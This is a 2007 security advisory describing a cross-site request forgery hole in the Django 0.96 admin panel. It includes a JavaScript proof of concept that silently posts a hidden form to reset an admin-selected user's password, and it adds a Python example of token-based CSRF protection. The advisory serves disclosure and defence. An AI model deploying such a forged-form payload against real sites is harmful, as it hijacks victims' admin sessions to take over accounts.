SECURITYVULNS:DOC:18323
Oct 31, 2007

Django 0.96 (stable) Admin Panel CSRF

vulners.com

Author: J. Carlos Nieto.
Date: Oct 21, 2007

There is a cross-site request forgery (CSRF) hole in Django's default admin panel.

Background

Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.
Django ships an automatic admin panel that lets a user with admin
privileges modify the database tables, including changing any user's
password.
See more at http://www.djangoproject.com

Summary

Django has, by default, no CSRF protection. This may allow an attacker
to change any user's password by tricking a victim who has admin privileges
into visiting a specially forged web page (even one on a totally different
server) that sends a request to change the password of the user with id = n.
The victim does not know that the form was submitted. If the victim has admin
privileges the exploit succeeds; otherwise nothing happens.

Severity

Mild. The problem exists only with the default installation and can be
easily solved using the CSRF middleware described here:
http://www.djangoproject.com/documentation/csrf/.

Proof of concept

<script type="text/javascript">
window.onload = function() {
    // Admin password-change URL for the user with id = 1; the browser
    // attaches the victim's session cookie to the request on its own.
    var url = "http://127.0.0.1:8000/admin/auth/user/1/password/";

    var pass = "funky";

    var param = {
        password1: pass,
        password2: pass
    };

    // Hidden form posting to the admin URL. No CSRF token is included,
    // because the default 0.96 installation does not check for one.
    var form = document.createElement('form');
    form.action = url;
    form.method = 'post';
    form.target = 'hidden';
    form.style.display = 'none';

    for (var i in param) {
        try {
            // ie: old IE only honours the name attribute set at creation time
            var input = document.createElement('<input name="'+i+'">');
        } catch(e) {
            // other browsers
            var input = document.createElement('input');
            input.name = i;
        }
        input.setAttribute('value', param[i]);
        form.appendChild(input);
    }
    document.body.appendChild(form);

    // Submitted into the hidden iframe below, so the victim sees nothing.
    form.submit();

}
</script>

<iframe name="hidden" style="display: none"></iframe>

Solution

Use Django's CSRF protection in all your applications. See
http://www.djangoproject.com/documentation/csrf/.
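To show why the middleware closes the hole described in the Summary, here is an added example (it is not part of the advisory and is not Django's own middleware code). It implements the same synchronizer-token pattern: a per-session secret is written into every server-rendered form under the field name Django's middleware uses, `csrfmiddlewaretoken`, and every state-changing request must echo it back. The in-memory `SESSIONS` and `USERS` tables, the dict-shaped `request` objects and the `change_password_view` function are assumptions made for the example so that it runs without Django.

```python
import hmac
import re
import secrets
from html import escape

# Constructed in-memory stand-ins for Django's session store and user table
# (assumptions for this example only).
SESSIONS = {}   # session id -> session dict
USERS = {}      # user id -> {"password": ...}

# Field name Django's CSRF middleware expects in POST data.
TOKEN_FIELD = "csrfmiddlewaretoken"


def get_or_create_csrf_token(session):
    """Synchronizer-token pattern: one unguessable secret per session."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def render_password_form(session, user_id):
    """Server-rendered admin form. The hidden token is only written into
    pages served to the logged-in user, so a page on another origin
    (the advisory's forged page) never gets to see it."""
    token = get_or_create_csrf_token(session)
    return (
        f'<form method="post" action="/admin/auth/user/{user_id}/password/">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{escape(token)}">'
        '<input type="password" name="password1">'
        '<input type="password" name="password2">'
        '</form>'
    )


def csrf_check(request):
    """Middleware-style check: a state-changing request must carry the
    token bound to the session named by the cookie."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True
    session = SESSIONS.get(request["cookies"].get("sessionid"))
    if session is None or "csrf_token" not in session:
        return False
    submitted = request["POST"].get(TOKEN_FIELD, "")
    # Constant-time comparison so response timing cannot leak the token.
    return hmac.compare_digest(submitted.encode(), session["csrf_token"].encode())


def change_password_view(request, user_id):
    """The protected admin view; returns (status, message)."""
    if not csrf_check(request):
        return 403, "CSRF verification failed"
    p1 = request["POST"].get("password1", "")
    p2 = request["POST"].get("password2", "")
    if not p1 or p1 != p2:
        return 400, "passwords do not match"
    USERS[user_id]["password"] = p1
    return 200, "password changed"


def simulate():
    """Replay the advisory's scenario against the protected view.

    Returns (forged_status, guessed_status, legitimate_status, final_password).
    """
    SESSIONS.clear()
    USERS.clear()
    SESSIONS["s1"] = {"user": "admin"}      # the victim's logged-in admin session
    USERS[1] = {"password": "original"}

    # The admin has visited the real page, so the session already holds a token.
    html = render_password_form(SESSIONS["s1"], 1)

    # 1. The proof-of-concept's cross-site POST: the browser sends the victim's
    #    cookie, but the attacker's page cannot supply the token.
    forged = {"method": "POST", "cookies": {"sessionid": "s1"},
              "POST": {"password1": "funky", "password2": "funky"}}
    forged_status, _ = change_password_view(forged, 1)

    # 2. The same request with a guessed token value: still rejected.
    guessed = dict(forged, POST=dict(forged["POST"], **{TOKEN_FIELD: "00" * 16}))
    guessed_status, _ = change_password_view(guessed, 1)

    # 3. Legitimate submission built from the server-rendered form.
    token = re.search(r'name="%s" value="([0-9a-f]+)"' % TOKEN_FIELD, html).group(1)
    legit = {"method": "POST", "cookies": {"sessionid": "s1"},
             "POST": {TOKEN_FIELD: token, "password1": "newpass", "password2": "newpass"}}
    legit_status, _ = change_password_view(legit, 1)

    return forged_status, guessed_status, legit_status, USERS[1]["password"]


if __name__ == "__main__":
    print(simulate())   # (403, 403, 200, 'newpass')
```

Running the script shows the two cross-site submissions rejected with 403 while the legitimate one succeeds, which is exactly the behaviour the advisory's fix produces: in Django of that era the check is enabled by adding `django.contrib.csrf.middleware.CsrfMiddleware` to `MIDDLEWARE_CLASSES`, as the linked documentation page describes, and the hidden token is then inserted into outgoing forms automatically.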

Disclosure Timeline

2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response
2007.10.21 - Advisory release

License

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons -
Attribution / Share Alike license.